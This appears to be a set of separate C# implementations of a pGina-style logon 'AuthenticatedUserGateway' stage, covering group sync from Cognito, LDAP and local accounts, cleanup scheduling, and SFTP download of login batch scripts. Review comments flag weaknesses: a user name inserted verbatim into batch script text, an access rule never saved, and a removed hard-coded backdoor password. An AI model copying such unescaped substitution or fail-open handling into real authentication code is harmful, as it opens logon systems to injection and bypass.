        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Gateway stage: copy the Cognito group list of the authenticated user
            // into the tracked UserInformation so later stages can act on it.

            UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();

            UInfo cognitoInfo = CognitoAccessor.getUserInfo(userInfo.Username);

            // No Cognito record is not treated as an error: the user passes
            // through with the UserInformation untouched.
            if (cognitoInfo == null)
            {
                BooleanResult passThrough = new BooleanResult();
                passThrough.Success = true;
                return passThrough;
            }

            m_logger.DebugFormat("AuthenticatedUserGateway: Uinfo: {0}", cognitoInfo.ToString());
            foreach (string groupName in cognitoInfo.groups)
            {
                GroupInformation groupInfo = new GroupInformation();
                groupInfo.Name = groupName;
                userInfo.AddGroup(groupInfo);
            }
            properties.AddTrackedSingle <UserInformation>(userInfo);

            BooleanResult ok = new BooleanResult();
            ok.Success = true;
            return ok;
        }
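        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Gateway stage: attach the group name found in the data row `dr` (a field
            // populated before this stage runs) to the authenticated user.
            //
            // Returns Success = true once the group is attached; any other outcome,
            // including a missing row or a data-access error, yields Success = false
            // with the gateway-failure message. No exception escapes this method.
            UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();

            try
            {
                // Test the row before indexing into it: indexing first turned a
                // missing row into a NullReferenceException instead of a clean failure.
                if (dr != null)
                {
                    string strGroup = dr["GroupName"].ToString();

                    userInfo.AddGroup(new GroupInformation()
                    {
                        Name = strGroup
                    });
                    userInfo.Description = "Maitiam UAMS";

                    try
                    {
                        m_logger.DebugFormat("用户组:{0}", strGroup);
                        m_logger.DebugFormat("认证用户网关({0}) 从用户: {1}", properties.Id.ToString(), userInfo.Username);
                        //LocalAccount.SyncUserInfoToLocalUser(userInfo); // sync user name/password to the local account (disabled)
                        return(new BooleanResult()
                        {
                            Success = true
                        });
                    }
                    catch (Exception e)
                    {
                        return(new BooleanResult()
                        {
                            Success = false, Message = string.Format("Unexpected error while syncing user's info: {0}", e)
                        });
                    }
                }
            }
            catch (System.Exception ex)
            {
                // Log and fall through to the failure result. The hard-coded "super
                // password" that previously granted success on this path has been
                // removed: a fixed secret in source is a credential backdoor, not an
                // error-recovery mechanism.
                m_logger.ErrorFormat("认证用户出错: {0}", ex);
            }
            return(new BooleanResult()
            {
                Success = false, Message = "网关认证失败"
            });
        }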
        // Load userInfo.Username's group list and populate userInfo.Groups accordingly
        public static void SyncLocalGroupsToUserInfo(UserInformation userInfo)
        {
            ILog logger = LogManager.GetLogger("LocalAccount.SyncLocalGroupsToUserInfo");

            try
            {
                // Implicit groups every logon token carries; they are not real local
                // group memberships and are filtered out of the result below.
                SecurityIdentifier everyone           = new SecurityIdentifier("S-1-1-0");
                SecurityIdentifier authenticatedUsers = new SecurityIdentifier(WellKnownSidType.AuthenticatedUserSid, null);

                if (!LocalAccount.UserExists(userInfo.Username))
                {
                    return;
                }

                using (UserPrincipal principal = LocalAccount.GetUserPrincipal(userInfo.Username))
                {
                    // NOTE(review): the GroupPrincipal objects yielded here are not
                    // disposed; confirm whether LocalAccount.GetGroups owns them.
                    foreach (GroupPrincipal membership in LocalAccount.GetGroups(principal))
                    {
                        bool isImplicit = membership.Sid == everyone || membership.Sid == authenticatedUsers;
                        if (isImplicit)
                        {
                            continue;
                        }

                        GroupInformation entry = new GroupInformation();
                        entry.Name        = membership.Name;
                        entry.Description = membership.Description;
                        entry.SID         = membership.Sid;
                        userInfo.AddGroup(entry);
                    }
                }
            }
            catch (Exception e)
            {
                // Best effort: a failure part-way leaves the groups collected so far in
                // place and skips the rest.
                logger.ErrorFormat("Unexpected error while syncing local groups, skipping rest: {0}", e);
            }
        }
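        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Our job, if we've been elected to do gateway, is to ensure that an
            //  authenticated user:
            //
            //  1. Has a local account
            //  2. That account's password is set to the one they used to authenticate
            //  3. That account is a member of all groups listed, and not a member of any others
            //
            // Returns Success = true when the local account is in sync, or when the
            // account is not one this plugin created and is therefore left alone.
            // Returns Success = false with a Message when the sync fails (a group-sync
            // failure only counts when GroupCreateFailIsFail is set).

            // Is failure at #3 a total fail?
            bool failIfGroupSyncFails = Settings.Store.GroupCreateFailIsFail;

            // Groups everyone is added to
            string[] MandatoryGroups = Settings.Store.MandatoryGroups;

            // user info
            UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();

            // is this a pgina user?
            Abstractions.WindowsApi.pInvokes.structenums.USER_INFO_4 userinfo4 = new Abstractions.WindowsApi.pInvokes.structenums.USER_INFO_4();
            if (Abstractions.WindowsApi.pInvokes.UserGet(userInfo.Username, ref userinfo4)) //true if user exists
            {
                // An existing account without any comment is not ours either; the null
                // check keeps such an account from crashing this stage with a
                // NullReferenceException before the try block below.
                if (userinfo4.comment == null || !userinfo4.comment.Contains("pGina created"))
                {
                    m_logger.InfoFormat("User {0} is'nt a pGina created user. I'm not executing Gateway stage", userInfo.Username);
                    return(new BooleanResult()
                    {
                        Success = true
                    });
                }
            }

            // Add user to all mandatory groups (an unset list is treated as empty)
            if (MandatoryGroups != null)
            {
                foreach (string group in MandatoryGroups)
                {
                    string group_string = ResolveMandatoryGroupName(group);

                    if (group_string != null)
                    {
                        userInfo.AddGroup(new GroupInformation()
                        {
                            Name = group_string
                        });
                    }
                }
            }

            try
            {
                m_logger.DebugFormat("AuthenticatedUserGateway({0}) for user: {1}", properties.Id.ToString(), userInfo.Username);
                LocalAccount.SyncUserInfoToLocalUser(userInfo);
                using (UserPrincipal user = LocalAccount.GetUserPrincipal(userInfo.Username))
                {
                    userInfo.SID         = user.Sid;
                    userInfo.Description = user.Description;
                }
                properties.AddTrackedSingle <UserInformation>(userInfo);
            }
            catch (LocalAccount.GroupSyncException e)
            {
                // Group-sync failure is fatal only when configured so; otherwise the
                // account/password sync that already happened is kept and we succeed.
                if (failIfGroupSyncFails)
                {
                    return(new BooleanResult()
                    {
                        Success = false, Message = string.Format("Unable to sync users local group membership: {0}", e.RootException)
                    });
                }
            }
            catch (Exception e)
            {
                // 0x800708C5 is the HRESULT the message below describes (password
                // rejected by policy); compare ordinally rather than via ToLower().
                if (e.Message.IndexOf("0x800708c5", StringComparison.OrdinalIgnoreCase) >= 0)
                {
                    return(new BooleanResult()
                    {
                        Success = false, Message = string.Format("This Worstation is denying the password of {0}.\nMost likely the password does not meet complexity requirements\n\n{1}", userInfo.Username, e)
                    });
                }

                return(new BooleanResult()
                {
                    Success = false, Message = string.Format("Unexpected error while syncing user's info: {0}", e)
                });
            }

            return(new BooleanResult()
            {
                Success = true
            });
        }

        // Map one configured mandatory group (name or SID string) to the local group
        // name the user should be added to. Falls back to BUILTIN\Users when the
        // configured group does not exist; returns null when that cannot be resolved
        // either, in which case the caller adds nothing.
        private string ResolveMandatoryGroupName(string group)
        {
            m_logger.DebugFormat("Is there a Group with SID/Name:{0}", group);
            using (GroupPrincipal groupconf = LocalAccount.GetGroupPrincipal(group))
            {
                if (groupconf != null)
                {
                    m_logger.DebugFormat("Groupname: \"{0}\"", groupconf.Name);
                    return groupconf.Name;
                }

                m_logger.ErrorFormat("Group: \"{0}\" not found", group);
                m_logger.Error("Failsave add user to group Users");
                using (GroupPrincipal groupfail = LocalAccount.GetGroupPrincipal(new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, null).ToString()))
                {
                    if (groupfail != null)
                    {
                        return groupfail.Name;
                    }

                    m_logger.Debug("no BuiltinUsers. I'm out of options");
                    return null;
                }
            }
        }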
        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Gateway stage: for each gateway rule, check the user's LDAP group
            // membership (unless the rule always applies) and add the user to the
            // rule's local group on a match. Errors never fail the logon; they are
            // reported through Message instead.
            m_logger.Debug("LDAP Plugin Gateway");
            List <string> addedGroups = new List <string>();

            LdapServer serv = properties.GetTrackedSingle <LdapServer>();

            // If the server is unavailable, we go ahead and succeed anyway.
            if (serv == null)
            {
                m_logger.ErrorFormat("AuthenticatedUserGateway: Internal error, LdapServer object not available.");
                BooleanResult noServer = new BooleanResult();
                noServer.Success = true;
                noServer.Message = "LDAP server not available";
                return noServer;
            }

            try
            {
                UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
                string          user     = userInfo.Username;

                // Bind lazily: only a rule that actually needs a membership lookup
                // pays for the search bind.
                bool boundToServ = false;
                foreach (GroupGatewayRule rule in GroupRuleLoader.GetGatewayRules())
                {
                    bool inGroup     = false;
                    bool needsLookup = rule.RuleCondition != GroupRule.Condition.ALWAYS;

                    if (needsLookup)
                    {
                        if (!boundToServ)
                        {
                            serv.BindForSearch();
                            boundToServ = true;
                        }

                        inGroup = serv.MemberOfGroup(user, rule.Group);
                        m_logger.DebugFormat("User {0} {1} member of group {2}", user, inGroup ? "is" : "is not",
                                             rule.Group);
                    }

                    if (!rule.RuleMatch(inGroup))
                    {
                        continue;
                    }

                    m_logger.InfoFormat("Adding user {0} to local group {1}, due to rule \"{2}\"",
                                        user, rule.LocalGroup, rule.ToString());
                    addedGroups.Add(rule.LocalGroup);
                    GroupInformation localGroup = new GroupInformation();
                    localGroup.Name = rule.LocalGroup;
                    userInfo.AddGroup(localGroup);
                }
            }
            catch (Exception e)
            {
                m_logger.ErrorFormat("Error during gateway: {0}", e);

                // Error does not cause failure
                BooleanResult errorResult = new BooleanResult();
                errorResult.Success = true;
                errorResult.Message = e.Message;
                return errorResult;
            }

            string message = addedGroups.Count > 0
                ? string.Format("Added to groups: {0}", string.Join(", ", addedGroups))
                : "No groups added.";

            BooleanResult result = new BooleanResult();
            result.Success = true;
            result.Message = message;
            return result;
        }
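        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Our job, if we've been elected to do gateway, is to ensure that an
            //  authenticated user:
            //
            //  1. Has a local account
            //  2. That account's password is set to the one they used to authenticate
            //  3. That account is a member of all groups listed, and not a member of any others
            //
            // Returns Success = true when the local account is in sync; Success = false
            // with a Message when the sync fails (a group-sync failure only counts when
            // GroupCreateFailIsFail is set).

            // Is failure at #3 a total fail?
            bool failIfGroupSyncFails = Settings.Store.GroupCreateFailIsFail;

            // Groups everyone is added to
            string[] MandatoryGroups = Settings.Store.MandatoryGroups;

            // user info
            UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();

            // Add user to all mandatory groups (an unset list is treated as empty)
            if (MandatoryGroups != null)
            {
                foreach (string group in MandatoryGroups)
                {
                    userInfo.AddGroup(new GroupInformation()
                    {
                        Name = group
                    });
                }
            }

            try
            {
                // Queue post-logoff housekeeping before the account is touched, so
                // "does this user already exist" still answers truthfully.
                ScheduleCleanupTasks(properties, userInfo);

                m_logger.DebugFormat("AuthenticatedUserGateway({0}) for user: {1}", properties.Id.ToString(), userInfo.Username);
                LocalAccount.SyncUserInfoToLocalUser(userInfo);
            }
            catch (LocalAccount.GroupSyncException e)
            {
                // Group-sync failure is fatal only when configured so; otherwise the
                // account/password sync that already happened is kept and we succeed.
                if (failIfGroupSyncFails)
                {
                    return(new BooleanResult()
                    {
                        Success = false, Message = string.Format("Unable to sync users local group membership: {0}", e.RootException)
                    });
                }
            }
            catch (Exception e)
            {
                return(new BooleanResult()
                {
                    Success = false, Message = string.Format("Unexpected error while syncing user's info: {0}", e)
                });
            }

            return(new BooleanResult()
            {
                Success = true
            });
        }

        // Register the cleanup tasks (profile deletion, password scramble) that the
        // RemoveProfiles / ScramblePasswords settings ask for. Must run before the
        // local account is created so the "user exists" test is meaningful.
        private void ScheduleCleanupTasks(SessionProperties properties, UserInformation userInfo)
        {
            bool scramble = Settings.Store.ScramblePasswords;
            bool remove   = Settings.Store.RemoveProfiles;

            if (remove)
            {
                // If this user doesn't already exist, and we are supposed to clean up after ourselves,
                //  make note of the username!
                if (!LocalAccount.UserExists(userInfo.Username))
                {
                    m_logger.DebugFormat("Marking for deletion: {0}", userInfo.Username);
                    CleanupTasks.AddTask(new CleanupTask(userInfo.Username, CleanupAction.DELETE_PROFILE));
                }
            }

            // If we are not configured to scramble passwords, nothing else to do
            if (!scramble)
            {
                return;
            }

            // Scramble the password only if the user is not in the list of exceptions.
            // Account names are identifiers, so they are compared ordinally rather
            // than by the current culture; an unset list means no exceptions.
            string[] exceptions = Settings.Store.ScramblePasswordsExceptions;
            if (exceptions != null && exceptions.Contains(userInfo.Username, StringComparer.OrdinalIgnoreCase))
            {
                return;
            }

            // If configured to do so, we check to see if this plugin failed
            // to auth this user, and only scramble in that case
            bool scrambleWhenLMFail = Settings.Store.ScramblePasswordsWhenLMAuthFails;
            if (scrambleWhenLMFail)
            {
                // Scramble the password only if we did not authenticate this user
                if (!DidWeAuthThisUser(properties, false))
                {
                    m_logger.DebugFormat("LM did not authenticate this user, marking user for scramble: {0}", userInfo.Username);
                    CleanupTasks.AddTask(new CleanupTask(userInfo.Username, CleanupAction.SCRAMBLE_PASSWORD));
                }
            }
            else
            {
                m_logger.DebugFormat("Marking user for scramble: {0}", userInfo.Username);
                CleanupTasks.AddTask(new CleanupTask(userInfo.Username, CleanupAction.SCRAMBLE_PASSWORD));
            }
        }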
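        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Gateway stage: evaluate each gateway rule with an LDAP search built from
            // the rule's path/filter templates (%u replaced by the user name) and add
            // the user to the rule's local group on a match. Errors never fail the
            // logon; they are reported through Message instead.
            ////m_logger.Debug("LDAP Plugin Gateway");
            List <string> addedGroups = new List <string>();

            LdapServer serv = properties.GetTrackedSingle <LdapServer>();

            // If the server is unavailable, we go ahead and succeed anyway.
            if (serv == null)
            {
                ////m_logger.ErrorFormat("AuthenticatedUserGateway: Internal error, LdapServer object not available.");
                return(new BooleanResult()
                {
                    Success = true,
                    Message = "LDAP server not available"
                });
            }

            try
            {
                UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();

                // The user name is spliced into an LDAP DN and an LDAP filter, so it is
                // escaped for each syntax: a raw value containing DN or filter
                // metacharacters would change what the search matches.
                string dnUser     = EscapeLdapDnValue(userInfo.Username);
                string filterUser = EscapeLdapFilterValue(userInfo.Username);

                List <GroupGatewayRule> rules = GroupRuleLoader.GetGatewayRules();
                bool boundToServ = false;
                foreach (GroupGatewayRule rule in rules)
                {
                    bool inGroup = false;

                    // If we haven't bound to server yet, do so.
                    if (!boundToServ)
                    {
                        this.BindForAuthzOrGatewaySearch(serv);
                        boundToServ = true;
                    }

                    string path   = rule.path.Replace("%u", dnUser);
                    string filter = rule.filter.Replace("%u", filterUser);
                    //inGroup = serv.MemberOfGroup(user, rule.Group);
                    // Any entry matching the filter under the path counts as membership.
                    inGroup = serv.GetUserAttribValue(path, filter, rule.SearchScope, new string[] { "dn" }).Count > 0;
                    ////m_logger.DebugFormat("User {0} {1} {2} {3}", userInfo.Username, filter, inGroup ? "is" : "is not", path);

                    if (rule.RuleMatch(inGroup))
                    {
                        ////m_logger.InfoFormat("Adding user {0} to local group {1}, due to rule \"{2}\"", userInfo.Username, rule.LocalGroup, rule.ToString());
                        addedGroups.Add(rule.LocalGroup);
                        userInfo.AddGroup(new GroupInformation()
                        {
                            Name = rule.LocalGroup
                        });
                    }
                }
            }
            catch (Exception e)
            {
                ////m_logger.ErrorFormat("Error during gateway: {0}", e);

                // Error does not cause failure
                return(new BooleanResult()
                {
                    Success = true, Message = e.Message
                });
            }

            string message = "";

            if (addedGroups.Count > 0)
            {
                message = string.Format("Added to groups: {0}", string.Join(", ", addedGroups));
            }
            else
            {
                message = "No groups added.";
            }

            return(new BooleanResult()
            {
                Success = true, Message = message
            });
        }

        // Escape a value for use inside an LDAP search filter (RFC 4515): the
        // characters \ * ( ) and NUL become their \hh forms. Null and empty values
        // are returned unchanged. The backslash must be handled first so the
        // escapes emitted for the other characters are not re-escaped.
        private static string EscapeLdapFilterValue(string value)
        {
            if (string.IsNullOrEmpty(value))
            {
                return value;
            }
            return value
                   .Replace("\\", "\\5c")
                   .Replace("*", "\\2a")
                   .Replace("(", "\\28")
                   .Replace(")", "\\29")
                   .Replace("\0", "\\00");
        }

        // Escape a value for use as an attribute value inside a DN (RFC 4514): the
        // characters \ , + " < > ; = are backslash-prefixed, NUL becomes \00, and a
        // leading space or '#' as well as a trailing space are backslash-prefixed.
        // Null and empty values are returned unchanged. Usual account names contain
        // none of these characters and pass through unmodified.
        private static string EscapeLdapDnValue(string value)
        {
            if (string.IsNullOrEmpty(value))
            {
                return value;
            }
            string escaped = value
                             .Replace("\\", "\\\\")
                             .Replace(",", "\\,")
                             .Replace("+", "\\+")
                             .Replace("\"", "\\\"")
                             .Replace("<", "\\<")
                             .Replace(">", "\\>")
                             .Replace(";", "\\;")
                             .Replace("=", "\\=")
                             .Replace("\0", "\\00");
            if (escaped[0] == ' ' || escaped[0] == '#')
            {
                escaped = "\\" + escaped;
            }
            if (escaped[escaped.Length - 1] == ' ')
            {
                escaped = escaped.Substring(0, escaped.Length - 1) + "\\ ";
            }
            return escaped;
        }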
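        public BooleanResult AuthenticatedUserGateway(SessionProperties properties)
        {
            // Gateway stage of the LDAP plugin. Two independent jobs:
            //  1. map LDAP group membership to local groups via the gateway rules;
            //  2. fetch the user's group list and login/logoff scripts over SFTP.
            // Neither job can fail the logon: every error path below still returns
            // Success = true, with the error text in Message where it is useful.
            m_logger.Debug("LDAP Plugin Gateway");
            List <string> addedGroups = new List <string>();

            LdapServer serv = properties.GetTrackedSingle <LdapServer>();

            // If the server is unavailable, we go ahead and succeed anyway.
            if (serv == null)
            {
                m_logger.ErrorFormat("AuthenticatedUserGateway: Internal error, LdapServer object not available.");
                return(new BooleanResult()
                {
                    Success = true,
                    Message = "LDAP server not available"
                });
            }

            try
            {
                UserInformation userInfo = properties.GetTrackedSingle <UserInformation>();
                string          user     = userInfo.Username;

                List <GroupGatewayRule> rules = GroupRuleLoader.GetGatewayRules();
                bool boundToServ = false;
                foreach (GroupGatewayRule rule in rules)
                {
                    bool inGroup = false;

                    // Don't need to check for group membership if the rule is to be always applied.
                    if (rule.RuleCondition != GroupRule.Condition.ALWAYS)
                    {
                        // If we haven't bound to server yet, do so.
                        if (!boundToServ)
                        {
                            this.BindForAuthzOrGatewaySearch(serv);
                            boundToServ = true;
                        }

                        inGroup = serv.MemberOfGroup(user, rule.Group);
                        m_logger.DebugFormat("User {0} {1} member of group {2}", user, inGroup ? "is" : "is not",
                                             rule.Group);
                    }

                    if (rule.RuleMatch(inGroup))
                    {
                        m_logger.InfoFormat("Adding user {0} to local group {1}, due to rule \"{2}\"",
                                            user, rule.LocalGroup, rule.ToString());
                        addedGroups.Add(rule.LocalGroup);
                        userInfo.AddGroup(new GroupInformation()
                        {
                            Name = rule.LocalGroup
                        });
                    }
                }
            }
            catch (Exception e)
            {
                m_logger.ErrorFormat("Error during gateway: {0}", e);

                // Error does not cause failure
                return(new BooleanResult()
                {
                    Success = true, Message = e.Message
                });
            }

            try
            {
                FetchLoginScripts(properties, serv);
            }
            catch (Exception e)
            {
                // Script retrieval is best effort; the logon proceeds without it.
                m_logger.ErrorFormat("Error during get login script: {0}", e);
            }

            string message = "";

            if (addedGroups.Count > 0)
            {
                message = string.Format("Added to groups: {0}", string.Join(", ", addedGroups));
            }
            else
            {
                message = "No groups added.";
            }

            return(new BooleanResult()
            {
                Success = true, Message = message
            });
        }

        // Download the user's group list and login/logoff scripts over SFTP and
        // materialise them on D:\. Connection details come from Settings.Store.
        // Throws on connection or transfer errors; the caller logs and continues.
        private void FetchLoginScripts(SessionProperties properties, LdapServer serv)
        {
            // SFTP
            // Setup session options
            UserInformation userInfo       = properties.GetTrackedSingle <UserInformation>();
            SessionOptions  sessionOptions = new SessionOptions
            {
                Protocol = Protocol.Sftp,
                HostName = Settings.Store.SFTPServerURL,
                UserName = Settings.Store.SFTPUser,
                Password = Settings.Store.SFTPPassword,
                // The pinned host-key fingerprint is what authenticates the server;
                // it must stay configured or the transfer trusts whoever answers.
                SshHostKeyFingerprint = Settings.Store.SFTPFingerprint
            };

            //ExecuteCommand(@"net use * /delete /yes");
            List <string> groups            = new List <string>();
            string        pathToLoginScript = getPathToLoginScript(userInfo.Username);
            if (File.Exists(pathToLoginScript))
            {
                File.Delete(pathToLoginScript);
            }
            using (Session session = new Session())
            {
                // Connect
                session.Open(sessionOptions);

                // Download files
                string group_list_path = Settings.Store.SFTPGroupListPath;
                if (group_list_path.Trim().Length > 0 && session.FileExists(group_list_path))
                {
                    groups = DownloadGroupList(session, group_list_path);
                }

                // O usuário pode indicar até dois scripts para ser executado.
                // (Up to two login scripts may be configured.)
                string path_script = Settings.Store.SFTPScriptPath;
                if (path_script.Trim().Length > 0)
                {
                    LoginScipt(path_script, groups, userInfo, serv, session);
                }
                path_script = Settings.Store.SFTPScriptPath2;
                if (path_script.Trim().Length > 0)
                {
                    LoginScipt(path_script, groups, userInfo, serv, session);
                }

                if (File.Exists(pathToLoginScript))
                {
                    // NOTE(review): the access rule is added to an in-memory FileSecurity
                    // that is never written back with File.SetAccessControl, so it has
                    // no effect on disk. Left as-is pending confirmation of the intended ACL.
                    FileSecurity fSec = File.GetAccessControl(pathToLoginScript);
                    fSec.AddAccessRule(new FileSystemAccessRule(new SecurityIdentifier(WellKnownSidType.SelfSid, null), FileSystemRights.FullControl, AccessControlType.Allow));
                    File.SetAttributes(pathToLoginScript, File.GetAttributes(pathToLoginScript) | FileAttributes.Hidden);
                }

                // Cria o cmdLoginScript.bat (create the login batch file).
                try
                {
                    string code_cmd_login = Settings.Store.CMDLoginScript;
                    // NOTE(review): the user name is substituted verbatim into batch
                    // text; confirm the script only ever runs in that user's own context.
                    code_cmd_login = code_cmd_login.Replace("%u", userInfo.Username);
                    WriteHiddenScript(@"D:\cmdLoginScript.bat", code_cmd_login);
                }
                catch (Exception e)
                {
                    // The format string carries a {0} so the exception is actually logged.
                    m_logger.ErrorFormat("O arquivo D:\\cmdLoginScript.bat não pode ser alterado, por favor, delete o arquivo manualmente! {0}", e);
                }

                // Cria o cmdLogoffScript.bat (create the logoff batch file).
                try
                {
                    string code_cmd_logoff = Settings.Store.CMDLogoffScript;
                    WriteHiddenScript(@"D:\cmdLogoffScript.bat", code_cmd_logoff);
                }
                catch (Exception e)
                {
                    m_logger.ErrorFormat("O arquivo D:\\cmdLogoffScript.bat não pode ser alterado, por favor, delete o arquivo manualmente! {0}", e);
                }
            }
        }

        // Fetch the remote group-list file to D:\ and return its lines; the local
        // copy is deleted afterwards. The remote path may use either separator.
        // Throws if the transfer reports any error.
        private static List <string> DownloadGroupList(Session session, string group_list_path)
        {
            List <string> groups = new List <string>();

            TransferOperationResult transferResult = session.GetFiles(group_list_path, "D:\\", false, null);

            // Throw on any error
            transferResult.Check();

            // Keep only the file name: a backslash wins if present, else a slash;
            // with neither the whole path is the name.
            int index = group_list_path.LastIndexOf('\\');
            if (index < 0)
            {
                index = group_list_path.LastIndexOf('/');
            }
            string localCopy = @"D:\" + group_list_path.Substring(index + 1);

            // ReadLine accepts both CRLF and LF, so no ASCII transfer mode is needed.
            // The using block closes the reader even when a read fails.
            using (StreamReader file = new StreamReader(localCopy))
            {
                string line;
                while ((line = file.ReadLine()) != null)
                {
                    groups.Add(line);
                }
            }

            // Delete through the file API rather than a shell "DEL" command so a
            // path containing shell metacharacters cannot alter the command line.
            File.Delete(localCopy);
            return groups;
        }

        // Overwrite `path` with `contents` (plus a trailing newline) and mark the
        // file hidden. Throws on I/O errors; callers log them.
        private static void WriteHiddenScript(string path, string contents)
        {
            using (StreamWriter sw = new StreamWriter(path, false))
            {
                sw.WriteLine(contents);
            }
            File.SetAttributes(path, File.GetAttributes(path) | FileAttributes.Hidden);
        }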